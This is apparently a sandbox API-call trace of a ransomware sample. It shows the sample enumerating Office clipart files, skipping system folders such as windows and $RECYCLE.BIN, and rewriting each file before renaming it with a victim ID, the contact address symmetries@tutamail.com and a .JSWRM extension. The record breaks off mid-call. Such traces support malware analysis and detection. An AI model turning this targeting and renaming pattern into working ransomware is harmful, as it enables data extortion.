[0075.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.496] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3104) returned 1 [0075.496] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc20) returned 0x24c1d0 [0075.496] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xc20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xc20, lpOverlapped=0x0) returned 1 [0075.573] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.573] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xc20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xc20, lpOverlapped=0x0) returned 1 [0075.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.574] CloseHandle (hObject=0x460) returned 1 [0075.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0075.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0075.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0075.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0075.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0075.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.574] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0075.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.575] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00224_.WMF", cAlternateFileName="")) returned 1 [0075.575] lstrcmpiW (lpString1="BS00224_.WMF", lpString2=".") returned 1 [0075.575] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="..") returned 1 [0075.575] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="...") returned 1 [0075.575] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="windows") returned -1 [0075.575] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="recovery") returned -1 [0075.575] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="perflogs") returned -1 [0075.575] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="documents and settings") returned -1 [0075.575] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.575] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="system volume information") returned -1 [0075.575] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="msocache") returned -1 [0075.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0075.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00224_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00224_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00224_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0075.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0075.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00224_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00224_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00224_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0075.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.576] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1588) returned 1 [0075.576] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x630) returned 0x23fc98 [0075.576] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x630, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x630, lpOverlapped=0x0) returned 1 [0075.578] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.578] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x630, lpOverlapped=0x0) returned 1 [0075.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.578] CloseHandle (hObject=0x460) returned 1 [0075.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0075.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0075.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0075.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0075.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0075.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.579] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0075.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.579] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00438_.WMF", cAlternateFileName="")) returned 1 [0075.579] lstrcmpiW (lpString1="BS00438_.WMF", lpString2=".") returned 1 [0075.579] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="..") returned 1 [0075.579] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="...") returned 1 [0075.579] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="windows") returned -1 [0075.579] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="recovery") returned -1 [0075.579] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="perflogs") returned -1 [0075.579] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="documents and settings") returned -1 [0075.579] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.579] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="system volume information") returned -1 [0075.580] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="msocache") returned -1 [0075.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0075.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00438_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00438_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00438_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0075.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00438_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00438_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00438_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.581] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1212) returned 1 [0075.581] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b0) returned 0x203550 [0075.581] ReadFile (in: hFile=0x460, lpBuffer=0x203550, nNumberOfBytesToRead=0x4b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x4b0, lpOverlapped=0x0) returned 1 [0075.582] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.582] WriteFile (in: hFile=0x460, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x4b0, lpOverlapped=0x0) returned 1 [0075.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0075.582] CloseHandle (hObject=0x460) returned 1 [0075.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0075.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0075.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0075.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0075.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0075.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.583] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0075.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.584] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x804, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00439_.WMF", cAlternateFileName="")) returned 1 [0075.584] lstrcmpiW (lpString1="BS00439_.WMF", lpString2=".") returned 1 [0075.584] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="..") returned 1 [0075.584] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="...") returned 1 [0075.584] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="windows") returned -1 [0075.584] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="recovery") returned -1 [0075.584] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="perflogs") returned -1 [0075.584] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="documents and settings") returned -1 [0075.584] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.584] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="system volume information") returned -1 [0075.584] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="msocache") returned -1 [0075.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0075.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00439_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00439_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00439_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0075.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0075.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00439_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00439_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00439_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0075.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.585] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2052) returned 1 [0075.585] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x800) returned 0x23fc98 [0075.585] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x800, lpOverlapped=0x0) returned 1 [0075.586] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.586] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x800, lpOverlapped=0x0) returned 1 [0075.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.586] CloseHandle (hObject=0x460) returned 1 [0075.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.587] MultiByteToWideChar (in: CodePage=0x0, 